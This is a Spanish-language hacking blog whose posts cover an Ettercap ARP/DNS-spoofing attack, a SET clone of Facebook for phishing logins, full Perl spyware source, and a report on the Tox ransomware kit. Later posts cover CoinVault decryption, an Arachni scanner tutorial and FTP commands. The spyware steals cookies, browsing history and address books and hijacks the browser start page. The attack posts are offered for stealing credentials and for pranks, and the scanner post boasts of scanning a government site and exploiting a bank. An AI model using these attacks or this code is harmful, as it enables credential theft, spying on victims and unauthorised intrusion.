HACKER ANGELWHITE GALC

jueves, 17 de marzo de 2016

Hacer un ataque dentro de la red desde Kali Linux



 ataque-hombre-en-el-medio-openssl

El otro día estaba jugando en mi red y se me ocurrió trollear a alguien por medio del Internet. Este método funciona para infectar o robar credenciales por medio de la misma red pero en este caso lo usare como trolleo. La única diferencia es que nos arriesgamos a hacer el ataque desde la misma red que estábamos navegando, esta herramienta se llama “Ettercap” ya hemos visto su significado pero por las dudas puedes entrara aquí.
Como sabemos que Kali Linux podemos formar nuestra index por medio del servidor pero hagamos el procedimiento.
Editamos la index con el cual queremos que la victima lo vea.
leafpad /var/www/html/index.html
Después lo guardamos y ejecutamos el servidor.

Screenshot from 2016-03-15 21-42-10
Ahora como vamos a ejecutar el servidor para que sea vea la index.

/etc/init.d/apache2 start
Ahora ejecutamos con DNS
locate etter.dns
Ahora podemos modificar la IP y la URL.
leafpad /etc/ettercap/etter.dns
Screenshot from 2016-03-15 20-17-44
Podemos buscar la palabra “redirect” y alli obsevamos la URL y la IP
La URL sera la url que la victima quiera entrar osea ejemplo la victima entra a la url colocada y le saldrá la index creada. Ahora borramos la IP y colocamos nuestra IP predeterminada. ejemplo en “IFCONFIG”
Screenshot from 2016-03-15 22-24-14
Ahora usaremos “Ettercap” para ejecutar el procedimiento.

ettercap -T -q -M arp -i wlan0 -P dns_spoof -p //route/
Rercuda la parte donde dice router sera la ip de nuestro router.En mi caso sera 192.168.1.1
Y en tu caso lo podras ver
route
y vemos que pasa si logramos poner la URL modificada anteriormente
En mi caso lo probe con “Youtube”
Screenshot from 2016-03-15 21-39-40
Cuando la victima ingrese a YouTube le aparecerá la index que hemos creado.
Espero haberte ayudado y esto puedes también para robar credenciales o infectar un sistema.

Clonando sitio web con Set ( Social Engineer Toolkit )


Saludos nuevamente  mis queridos fieles lectores y visitantes de mi humilde blog, en esta oportunidad tocaremos sobre el tema del "Phishing or /Fake or /Scam" y el metodo de ataque conocido mediante Set ( Social Engineer Toolkit ) en Kali linux.



Phishing - es el método mas utilizado por los ciberdelincuentes para estafar y obtener información de las victimas en este caso sobre el correo electrónico o usuario y la contraseña para el robo de dinero o de perfil del usuario en general , Clonando una pagina web donde lo enviara a la victima asiendo creer que es la web original y obtener toda su información en segundos.

Utilizando SET 

Abriremos primeramente el SET : 

 Aplicaciones > Kali Linux > Herramientas de Explotación > Herramienta de Ingeniería Social >setoolkit 


Lo primero que haremos sera poner el la opcion "1 " ,porque ?
porque simplemente utilizaremos el medio de ataque Ingiera social 



Como vemos nos sale otras 11 opciones la que nosotros escogeremos sera el numero " 2 " , porque utilizaremos un sitio web para clonar y crear el medio de ataque.



Luego de ello nos saldra nuevamente otras 8 opciones donde nosotros pondremos el numero "3"
porque vamos a  clonar la web al igual que lo subirá en el servidor Local y a recibir los datos de la victima.


Luego de ello nos saldrá nuevamente lo siguiente :


Le pondremos " 2 " . nos pedirá la IP  para crear el servidor infectado con el Pishing ! le procedemos a poner la IP "LOCAL" 192.168.10.104 "
luego nos parecerá una interrogante la cual nos dice que sitio web deseamos clonar :
en este caso lo mas utilizado "www.facebook.com" 




Como vemos el servidor esta On  para verificar nuestro Pishing tecleamos nuestra IP que pusimos en este caso 192.168.10.104 en el navegador : 




Lo que haremos sera enviarle el link  a la victima  y utilizar nuestro ingenio del metodo la cual sera emitido el mensaje y el link 

La victima una vez aya abierto el link , creera que es la web original  la cual pondrá sus datos del perfil en este caso :


Luego de que la victima le haga clip en "iniciar sesión" automáticamente sera direccionado a la web original de facebook !, pero lo mejor es que ya hemos capturado los paquetes de datos la cual automáticamente sera visible en la terminal del Set 

Example : 


Esto fue todo mis fieles lectores!, saludos y éxitos para todo

jueves, 26 de noviembre de 2015

Codigo Fuente del Virus spyware



 



Código:

############################################
### KSpyware v0.1 for educational purpose ###############
############################################

use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;

############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################

sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";

opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";

print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}


#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################

sub indexsites {
my $name;
$name=Win32::LoginName();

$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

}

########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################

sub mails {
my $name;
$name=Win32::LoginName();

$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);

}

#####################################
### Hijack IE by modifying the main page ##########
#####################################

sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};

$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}

#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################

sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}

###################
### Entry point !!! #######
###################

$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";

programfiles();
indexsites();
mails();
mainpage();
pub();

exit 0;


Ahora les explicare para que sirve cada modulo de este codigo en perl.

Con este codigo obtendremos una lista de programas instalados en el sistema.

Código:

############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################

sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";

opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";

print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}


Con este codigo obtendremos las direcciones URL que la victima a visitado, tambien tendremos las cookies.

Código:

#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################

sub indexsites {
my $name;
$name=Win32::LoginName();

$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

}


Con este codigo obtendremos direcciones de correo electronico para poder hacer spam...

Código:

########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################

sub mails {
my $name;
$name=Win32::LoginName();

$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);

}


Con este codigo sabotearemos el IE explorer para cambiar la pagina de inicio.

Código:

#####################################
### Hijack IE by modifying the main page ##########
#####################################

sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};

$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}


Para utilizar este codigo necesitamos que el Net Send este activado, asi podemos enviar anuncioes etx es como spam.

Código:

#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################

sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}


Y con este el entry point...

Código:

###################
### Entry point !!! #######
###################

$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";

programfiles();
indexsites();
mails();
mainpage();
pub();

exit 0;

.perl

Tox, cómo crear tu propio ransomware en 3 pasos

McAfee descubrió en la Deep Web unos kits de construcción de ransomware que permiten fácilmente construir el malware en sólo 3 pasos, implementando un interesante modelo de negocio.
Página en la Deep Web
En el submundo del crimen es fácil encontrar kits de construcción de malware que permiten fácilmente construir códigos maliciosos a partir de plantillas existentes y en los mismos casos a partir de aplicaciones legítimas. Una nueva tendencia surgió de investigación por expertos de McAfee es una especie de constructor de ransomware fácil de usar, esta familia de malware es cada vez más popular en el ecosistema criminal y los ladrones están tratando de capturar esta oportunidad.
El kit de construcción de ransomware, apodado Tox, está disponible en línea de forma gratuita en la web oscura desde el 19 de mayo. La dirección .onion de la página web que ofrecen es:

toxicola7qwv37qj.onion
"Hemos desarrollado un virus que, una vez abierto en un sistema operativo Windows, encripta todos los archivos. Una vez finalizado este proceso, se muestra un mensaje preguntando a pagar un rescate a una dirección bitcoin para desbloquear los archivos. "
Establece la presentación de Tox disponible en la página principal.

Un usuario interesado en Tox puede suscribirse al servicio de crear su propio virus. Los autores explican que es muy fácil crear un ransomware en unos sencillos pasos:

  • Decida la cantidad de rescate.
  • Escriba su "causa".
  • Escriba el captcha

Los creadores de Tox solicitan un porcentaje del importe pagado como rescate por las víctimas, garantizan el anonimato de los pagos y de transferencia de malware a través de la red Bitcoin y Tor. Los autores de Tox garantizan que la tasa de detección para los virus generados por la plataforma es muy baja.

Pasos a seguir para la creación del virus
"Una vez que haya descargado el virus, lo que tiene que infectar a las personas (sí, puedes enviar spam del mismo virus a más personas). ¿Cómo? Esa es tu parte. La práctica más común es de spam como un archivo adjunto de correo electrónico. Si decides seguir este método, asegúrate de comprimir el archivo para evitar los antivirus y detectores antispam. "Se informa en el sitio web oficial.
"La parte más importante: el bitcoin pagado por la víctima será acreditado a tu cuenta. No hacemos más que mantener una cuota de 30% de los ingresos, por lo que si se especifica $100 de rescate, recibirás $70 y nosotros vamos a conseguir $30, es justo, ¿no? "

La característica clave de Tox son:

Tox es gratuito. Sólo tienes que registrarte en el sitio.
Tox depende de Tor y Bitcoin. Eso permite un cierto grado de anonimato.
El malware funciona como se anuncia.

De entrada, el nivel de evasión antimalware es bastante alto, es decir, los objetivos necesitarían controles adicionales activos (HIPS, lista de acceso, sandbox) para capturar o impedir la infección. La detección antimalware es bastante baja, es decir, los objetivos del malware necesitarían controles establecidos adicionales (HIPS, listas de acceso, sandboxing) para atrapar o evitar esto.

El modelo de la delincuencia-como-servicio implementado por el autor de Tox es tan simple como efectivo, el constructor de malware genera un ejecutable de alrededor de 2 MB que se disfraza como un archivo .scr.

Los suscriptores de Tox pueden distribuirlo como prefieren, mientras que el servicio oculto Tox hará un seguimiento de cualquier instalación y el beneficio correspondiente. Los clientes de Tox recibirán sus fondos directamente en la dirección Bitcoin que proporcionaron durante la fase de suscripción.

El virus Tox descarga primero los componentes esenciales para trabajar, Curl y el cliente TOR.

Los expertos destacaron que muchos otros actores de amenazas adopten este modelo de venta, también esperan que los autores de malware mejorarán las capacidades de evasión de sus agentes maliciosos y utilizarán cifrado para proteger el tráfico de malware.

martes, 17 de noviembre de 2015

Cómo Eliminar el Ransomware CoinVault y Recuperar tus Archivos

En la mayoría de los casos, si un ransomware logra infectar tu máquina, no hay mucho que puedas hacer. Por suerte, de vez en cuando la policía y las compañías de seguridad cibernética logran neutralizar los servidores de comando y control de ciertos ransomwares y recuperan información de ellos. Esta información es muy útil, ya que ayuda a crear herramientas de descifrado que permiten recuperar archivos de los usuarios que fueron bloqueados por estos malwares. Recientemente, la ciber-policía holandesa y Kaspersky Lab crearon una de estas soluciones para las víctimas del ransomware CoinVault.







Si quieres saber más acerca de CoinVault, puedes leer este reporte detallado de Securelist. Si estás interesando en saber cómo Kaspersky creó la solución que descifrar los códigos criptográficos que bloqueaban los archivos, chequea este artículo. Ahora bien, si quieres saber cómo puedes deshacerte de este ransomware y recuperar tus archivos, continúa leyendo:
Paso 1: comprueba si estás infectado con CoinVault
Primero debes asegurarte de que tus archivos fueron bloqueados por CoinVault y no por otro ransomware. Esto es bastante fácil de determinar: si CoinVault infectó tu sistema, ésta será la imagen que aparece en tu pantalla:

convault-decryption-1 


Paso 2: consigue la dirección de la billetera Bitcoin
En la parte de abajo a la derecha de la ventana de CoinVault verás la dirección de la billetera Bitcoin de este ransomware (está marcada con una elipse negra en la imagen de arriba). Es muy importante que copies y guardes esta dirección.

Paso 3: Consigue la lista de archivos encriptados
En la parte superior izquierda de la ventana verás un botón que dice: “View encrypted filelist” -ver la lista de archivos encriptados- (está marcado con una elipse azul en la imagen de arriba). Clickea en este botón y graba la lista en un archivo aparte.

Paso 4: Elimina el ransomware CoinVault
Ingresa en https://kas.pr/kismd-cvault y descarga la versión de prueba de Kaspersky Internet Security. Instálala y elimina CoinVault de tu sistema. Antes de hacer esto, asegúrate de que has cumplido con los pasos 2 y 3.

Paso 5: Ingresa en https://noransom.kaspersky.com
En esta dirección deberás ingresar la dirección Bitcoin que obtuviste en el paso 2. Si tu dirección Bitcoin es conocida, la IV y la clave aparecerán en la pantalla. Es posible que aparezcan muchas IVs y claves. En este caso, guárdalas todas.

coinvault-decryption-2 


Paso 6: descarga la herramienta de descifrado
Descarga la herramienta desde aquí: https://noransom.kaspersky.com y ejecútala en tu PC. Si te aparece un mensaje de error como el que se muestra aquí, ve al paso 7. Si no te aparece nada, omite el paso 7 y continúa con el paso 8.


coinvault-decryption-3 


Paso 7: Descarga e instala las bibliotecas adicionales
Ingresa en http://www.microsoft.com/en-us/download/details.aspx?id=40779 y sigue las instrucciones que aparecen en el sitio web. Luego, instala el software.


Paso 8: ejecuta la herramienta de descifrado
Cuando inicies la herramienta, verás la pantalla que se muestra a continuación:


coinvault-decryption-4 

Paso 9: comprueba si el descifrado funciona correctamente
Cuando ejecutes el programa por primera vez, recomendamos que chequees el funcionamiento del descifrado. Para esto, haz lo siguiente:
  • Clickea en el botón “Select File”, ubicado en la casilla “Single File Decryption” y luego selección cualquiera de los archivos que quieras descifrar.
  • Ingresa la IV de que obtuviste en la página web
  • Ingresa la clave que obtuviste de la página web
  • Haz click en el botón “Start” para comenzar.
Verifica si el archivo fue descifrado correctamente.






Paso 10: Descifra todos los archivos bloqueados por CoinVault.


Si todo salió bien en el paso 9, podrás recuperar todos tus archivos a la vez. Para hacer esto, selecciona la lista de archivos encriptados que guardaste en el paso 3, ingresa tu IV y tu clave e inicia el proceso de descifrado. Podrás elegir la opción “Overwrite encrypted file with decrypted contents” para sobreescribir los archivos bloqueados.
Si obtuviste muchas IVs y claves cuando ingresaste la dirección de la billetera Bitcoin, por favor ten mucho cuidado. Al momento, no estamos 100% seguros de dónde provienen las IVs y claves múltiples. En este caso recomendamos no tildar la casilla de “Overwrite encrypted file with decrypted contents”. Si algo saliera mal con el descrifrado, podrás utilizar otra IV+clave hasta lograr completar el descifrado.
Si no recibiste ninguna IV y/o clave, deberás esperar y chequear el sitio https://noransom.kaspersky.com regularmente, dado que la investigación todavía se encuentra en marcha. Todas las claves e IVs faltantes se irán agregando a medida que estén disponibles.


lunes, 16 de noviembre de 2015

Arachni - Web Application Security Scanner Framework Kali Linux 2.0



Saludos mis fieles lectores en esta oportunidad, les traigo Arachni  es una escanner de vulnerabilidades web ya algo  conocido desde hace años, pero hasta el dia de hoy es de gran ayuda para las investigaciones de vulnerabilidades a nivel mundial, ya que hasta la actualidad mantiene una actualización en sus repertorios frecuentemente, con la cual en este articulo vamos a interactuar con sus interfaces en la terminal  y en plataforma web.

Caracteristicas:

General

  • Cookies-jar / soporte para cookies.
  • Apoyo encabezado personalizado.
  • Soporte SSL con opciones de grano fino.
  • Agente de usuario spoofing.
  • El soporte de proxy de SOCKS4, SOCKS4A, SOCKS5, HTTP / 1.1 y HTTP / 1.0.
  • Autentificación Proxy.
  • Autenticación del sitio (basado en SSL, basada en formularios, Cookie Jar, Basic-Digest, NTLMv1, Kerberos y otros).
  • Detección automática de registro de salida y re-inicio de sesión durante la exploración (cuando el inicio de sesión inicial se realizó a través del inicio de sesión automático, login_script o plugins del proxy).
  • Página 404 personalizada detección.
  • IU abstracción:
  • Interfaz de línea de comandos.
  • Interfaz Web del usuario.
  • Pausa funcionalidad / reanudar.
  • Apoyo hibernación - Suspender a y restaurar desde el disco.
  • Peticiones HTTP asíncrona de alto rendimiento.


Navegación spider Html5 Javascript DOM, AJAX

Arachni incluye un entorno de navegador integrado, de bienes con el fin de proporcionar una cobertura suficiente para las aplicaciones web modernas que hacen uso de tecnologías como HTML5, JavaScript, manipulación DOM, AJAX, etc.
La información pertinente incluye:


  • Página DOM, como código HTML.
  • Con una lista de transiciones DOM requeridas para restaurar el estado de la página a la que en el momento en que se registra.
  • DOM original (es decir, antes de la acción que causó la página para iniciar sesión), como código HTML.
  • Con una lista de transiciones DOM.
  • Sumideros de flujo de datos - Cada fregadero es un método de JS que recibió un argumento viciado.
  • Objeto principal del método (ej .: DOMWindow).
  • Firma del método (ej .: decodeURIComponent ()).
  • Lista de argumentos.
  • Con la mancha identificada situado recurrentemente en los objetos incluidos.
  • Método de código fuente.
  • Stacktrace JS.
  • Flujo de ejecución se hunde - Cada fregadero es una carga útil JS ejecutado con éxito, ya que se inyecta por los controles de seguridad.
  • Incluye un stacktrace JS.
  • JavaScript pila-rastros incluyen:
  • Nombres de los métodos.
  • Ubicaciones método.
  • Códigos fuente Método.
  • Las listas de argumentos.

Browser-cluster

El clúster navegador es lo que coordina el análisis de navegador de los recursos y permite que el sistema para realizar operaciones que normalmente serían bastante tiempo de una forma de alto rendimiento.

Las opciones de configuración incluyen:


Mediante la inspección de todas las páginas posibles y sus estados (cuando se utiliza código de cliente) Arachni es capaz de extraer y auditar los siguientes elementos y sus entradas:


Junto con los que requieren la interacción con un navegador real debido a eventos DOM.
Campo de golf
Junto con los que tienen parámetros del lado del cliente en su fragmento, es decir:

  • LinkTemplates - lo que permite la extracción de insumos arbitrarias de caminos genéricos, basados ​​en las plantillas suministradas por el usuario - útil cuando las reglas de reescritura no están disponibles.
  • Junto con los que tienen parámetros del lado del cliente en sus fragmentos de URL, es decir: http://example.com/#/param/val/param2/val2
  • Galletas
  • Encabezados
  • Elementos del lado del cliente genéricos como entradas que se han asociado eventos DOM.
  • Parámetros AJAX-petición.
  • Solicitar datos JSON.
  • Datos de la solicitud XML.
  • Arquitectura distribuida abierta

En la actualidad, las siguientes plataformas se pueden identificar:


Sistemas operativos
  • BSD
  • Linux
  • Unix
  • Ventanas
  • Solaris
  • Servidores Web
  • apache
  • IIS
  • Nginx
  • Gato
  • Embarcadero
  • Lenguajes de programación
  • PHP
  • ÁSPID
  • ASPX
  • JSP
  • Pitón
  • Rubí
  • Marcos
  • Estante

El usuario también tiene la opción de especificar plataformas adicionales (como un servidor de base de datos) con el fin de ayudar al sistema sea lo más eficiente posible. Alternativamente, la huella dactilar se puede desactivar por completo.

Por último, Arachni siempre errar por el lado de la precaución y enviar todas las cargas útiles disponibles cuando no identifica plataformas específicas.

Activo


  • Inyección SQL (sql_injection) - basado en la detección de errores.
  • Oráculo
  • InterBase
  • PostgreSQL
  • MySQL
  • MSSQL
  • EMC
  • SQLite
  • DB2
  • Informix
  • Firebird
  • SAP DB Max
  • Sybase
  • Frontbase
  • Ingres
  • HSQLDB
  • MS Access
  • Ciego de inyección SQL utilizando el análisis diferencial (sql_injection_differential).
  • Ataques de temporización de inyección SQL utilizando Ciegos (sql_injection_timing).
  • MySQL
  • PostgreSQL
  • MSSQL
  • NoSQL inyección (no_sql_injection) - detección de la vulnerabilidad basada error.
  • MongoDB
  • Inyección utilizando el análisis de Ciegos NoSQL diferencial (no_sql_injection_differential).
  • Detección CSRF (CSRF).
  • Inyección de código (code_injection).
  • PHP
  • Rubí
  • Pitón
  • JSP
  • ASP.NET
  • Ataques de temporización de inyección de código utilizando Ciegos (code_injection_timing).
  • PHP
  • Rubí
  • Pitón
  • JSP
  • ASP.NET
  • Inyección LDAP (ldap_injection).
  • Recorrido Path (path_traversal).
  • *nada
  • Ventanas
  • Gato
  • La inclusión de archivos (file_inclusion).
  • *nada
  • Ventanas
  • Gato
  • PHP
  • Perl
  • División de Respuesta (response_splitting).
  • Inyección de comandos OS (os_cmd_injection).
  • *nada
  • * BSD
  • IBM AIX
  • Ventanas
  • Ciegos inyección de comandos OS utilizando ataques de temporización (os_cmd_injection_timing).
  • Linux
  • * BSD
  • Solaris
  • Ventanas
  • Inclusión de archivo remoto (RFI).
  • Redirecciones no validadas (unvalidated_redirect).
  • Redirecciones DOM no validadas (unvalidated_redirect_dom).
  • XPath inyección (xpath_injection).
  • Genérico
  • PHP
  • Java
  • dotNET
  • libXML2
  • XSS (XSS).
  • Sendero XSS (xss_path).
  • XSS en caso de atributos de elementos HTML (xss_event).
  • XSS en etiquetas HTML (xss_tag).
  • XSS en el contexto de la escritura (xss_script_context).
  • DOM XSS (xss_dom).
  • Insumos DOM XSS (xss_dom_inputs).
  • Contexto guión DOM XSS (xss_dom_script_context).
  • El código fuente de divulgación (source_code_disclosure)
  • XML entidad externa (xxe).
  • Linux
  • * BSD
  • Solaris
  • Windows

Pasivo


  • Métodos HTTP permitidos (allowed_methods).
  • Archivos de respaldo (backup_files).
  • Directorios de copia de seguridad (backup_directories)
  • Directorios comunes (common_directories).
  • Archivos comunes (common_files).
  • PUT HTTP (http_put).
  • La insuficiente protección de la capa de transporte para las formas de contraseña (unencrypted_password_form).
  • Detección de WebDAV (WebDAV).
  • Detección de HTTP TRACE (xst).
  • Número de tarjeta de crédito de la divulgación (credit_card).
  • Usuario divulgación CVS / SVN (cvs_svn_users).
  • Privado divulgación dirección IP (private_ip).
  • Puertas traseras (backdoors comunes).
  • mala configuración LÍMITE .htaccess (htaccess_limit).
  • Respuestas interesantes (interesting_responses).
  • Grepper objeto HTML (html_objects).
  • Dirección de divulgación (emails) E-mail.
  • Número de Seguro Social de los EE.UU. divulgación (SSN).
  • Lista de directorios contundente (directory_listing).
  • Mezcla de Recursos / Scripting (mixed_resource).
  • Galletas inseguros (insecure_cookies).
  • HttpOnly galletas (http_only_cookies).
  • La función de autocompletar para los campos de formulario de contraseña (password_autocomplete).
  • Origen de la parodia de acceso Restricción Bypass (origin_spoof_access_restriction_bypass)
  • Carga basada en formularios (form_upload)
  • localstart.asp (localstart_asp)
  • Conjunto de la galleta por un dominio principal (cookie_set_for_parent_domain)
  • Missing cabeceras-Transporte-seguridad estrictas para los sitios HTTPS (HSTS).
  • Missing X-Frame-Options encabezados (x_frame_options).
  • Política CORS Inseguro (insecure_cors_policy).
  • Política entre dominios Inseguro (allow-access-from) (insecure_cross_domain_policy_access)
  • Política entre dominios Inseguro (permitir-http-request-headers-from) (insecure_cross_domain_policy_headers)
  • Política de cliente de acceso Inseguro (insecure_client_access_policy)
  • Reporteros

  • HTML (zip)
  • Texto
  • JSON
  • XML
  • YAML.

Aceptación de arachi y sus capacidades según su fuente


Puntuaciones de detección de vulnerabilidades representan la capacidad de un escáner para detectar diferentes tipos y permutaciones de vulnerabilidades, así como la exactitud de los resultados cuando se trata de trampas que comúnmente causan falsos positivos.

Detección y precisión las puntuaciones de vulnerabilidad se pueden encontrar en:

http://sectoolmarket.com/web-application-scanners/57.html

Puntajes Arachni:

  • SQL inyección: 100% (0% de falsos positivos)
  • XSS Reflejado: 90,91% (0% de falsos positivos) - Misses casos que requieren soporte para el lenguaje VBScript ahora obsoleto.
  • Inclusión de archivo local: 100% (0% de falsos positivos)
  • Inclusión de archivo remoto: 100% (0% de falsos positivos)
  • Redirección no validado: 100% (0% de falsos positivos)
  • Archivos de copia de seguridad: 100% (0% de falsos positivos)


La interfaz de usuario de la web permite que varios usuarios realizar y gestionar múltiples exploraciones y luego colaborar en esas exploraciones y las cuestiones que han iniciado sesión. También hace que el manejo y el aprovechamiento de la naturaleza distribuida de Arachni muy fácil, lo que le permite correr la carga de trabajo de muchas exploraciones a través de un charco de despachadores.

Estos resultados se derivan del hecho de que Arachni aprende de comportamiento de la aplicación web y de forma inteligente se adapta a cada recurso de aplicación web, que lleva a una gran cobertura y precisión la vulnerabilidad - entre otras cosas.

referencia:
http://www.arachni-scanner.com/features/framework#Checks

Descarga:

http://www.arachni-scanner.com/download/

Al momento que descarguen el paquete de instalación acuérdense de escoger el que sea adaptable para su arquitectura en mi caso eligiere el mio que es de 64 bits

La descargare por la terminal:

root@kali:~# wget https://github.com/Arachni/arachni/releases/download/v1.3.2/arachni-1.3.2-0.5.9-linux-x86_64.tar.gz

Una ves ya cargado completamente la descarga lo que haremos sera extraerlo.

root@kali:~# tar -zxvf arachni-1.3.2-0.5.9-linux-x86_64.tar.gz

 ahora lo que haremos sera entrar a la carpeta extraída y entrar al modulo "bin" para ejecutar la interface web que sera nuestra primera plataforma de prueba en Arachni.

root@kali:~# cd arachni-1.3.2-0.5.9
root@kali:~/arachni-1.3.2-0.5.9# cd bin
root@kali:~/arachni-1.3.2-0.5.9/bin# ./arachni_web
Como podemos observar ya iniciamos nuestra servidor local con la plataforma de Arachni, en la parte de abajo vemos una lista del protocolo tcp en este caso es el link de nuestra plataforma en el localhost

* Listening on tcp://localhost:9292


Usted se preguntara ¿cual sera las credenciales de usuario?, las credenciales lo encontramos en el directorio principal de la carpeta en el archivo "README",pero haré una prueba para los que no entiendan, entraremos a la carpeta mencionada y ejecutar el archivo.

root@kali:~# cd arachni-1.3.2-0.5.9
root@kali:~/arachni-1.3.2-0.5.9# ls
root@kali:~/arachni-1.3.2-0.5.9# nano README


Cuando hallamos abierto el archivo con nano del README, deben bajar hasta encontrar la linea de dichas credenciales, de igual manera pueden abrirlo con leafpad

Entrar nuevamente a la plataforma y añaden las credenciales administrativas:



Interactuando con la plataforma 

Ahora que ya tenemos todo en orden, lo que haremos vamos a dirigirnos a la sesión "Scans" para establecer nuestra URL con la cual vamos auditar como lo vemos en la siguiente imagen:

Una ves establecido el url que vamos auditar, le daremos en GO! para iniciar la auditoria, entonces el escaner empezara a auditar la plataforma, en su proceso en vivo puede mostrar los resultados de las fallas encontradas, en mi caso fue muy sencilla encontrar y explotar un Banco.

Ya terminamos con la inteface web, ahora vamos a dirigirnos en la sección por la terminal, cabe aclarar que pueden ejecutarlo en la misma carpeta o por la terminal en cualquier modulo, ya que kali linux tiene instalado esta herramienta, pero su versión web tiene errores, es por eso que descargue el complemento web para ejecutarlo sin problemas : )

root@kali:~# arachni http://www.peru.gob.pe/

La imagen que acabo de mostrar solo es el 3% de la auditoria que esta llevando acabo, si desea usted puede ver los resultados en su totalidad cuando lo ejecute sin mas que decir un saludo especial!

domingo, 15 de noviembre de 2015

Conectarse y trabajar en un FTP mediante la terminal

Para subir, bajar o administrar el contenido de un FTP tenemos un sin fin de aplicaciones gráficas, Filezilla es de las más populares. Pero, ¿cómo hacer esto desde la línea de comandos?
Sobre todo cuando trabajamos en un servidor y no tenemos GUI, necesitamos subir algún archivo a un FTP o simplemente borrar algo, crear una carpeta, etc, hacer cualquier cosa y solo contamos con nuestra terminal, nada más.
Para trabajar con un servidor FTP nos basta un solo comando:
 abrimos nuestra terminal

ftp

Ponemos el comando ftp y seguido de él la dirección IP (o host) del servidor FTP al que deseamos conectarnos y listo, por ejemplo:

ftp 192.168.128.2

Como se muestra en la imagen más abajo, nos solicitará el usuario, lo escribimos y presionamos Enter, seguidamente nos pedirá el password, lo escribimos y presionamos Enter, listo ya entramos!
ftp-usuario-login
Ahora es donde escribimos los comandos en esta nueva shell que es la shell de ftp, por ejemplo para listar usamos el comando ls

ls

Aquí un screenshot:
ftp-ls
Hay muchos más comandos, por ejemplo:
  • mkdir : Crear carpetas
  • chmod : Cambiar permisos
  • del : Borrar archivos
¿se parecen a los de Linux no? … jeje, si escriben help en la shell del FTP les salen comandos que pueden usar:
ftp-help
La cuestión (y que algunos se preguntan) imagino sea … ¿cómo subir un archivo no?
Para subir un archivo el comando es send
La sintaxis es:

send archivo-local archivo-final

Por ejemplo, supongamos que tengo en mi Home un archivo llamado video.mp4 y deseamos subirlo a una carpeta llamada videos, el comando sería:

send video.mp4 videos/video.mp4

Siempre deben especificar el nombre del vídeo final, no importa si es el mismo o si no desean que cambien, deben especificarlo igual, es obligatorio.
Así de simple, el log/output que nos devuelve es similar a este:
local: video.mp4 remote: videos/videdo.mp4
200 PORT command successful.
150 Opening BINARY mode data connection for test.
226 Transfer complete. 0 bytes transferred. 0.00 KB/sec.
Como siempre les digo, si desean conocer muchas más opciones basta con leerse el manual del comando:

man ftp

O bien leerse el manual en algún sitio de internet.
Bueno eso, no pretendo que esto sea un super manual ni mucho menos … es para sentar las bases solamente 😉
Aún así, espero le haya sido de utilidad a algunos.
Saludos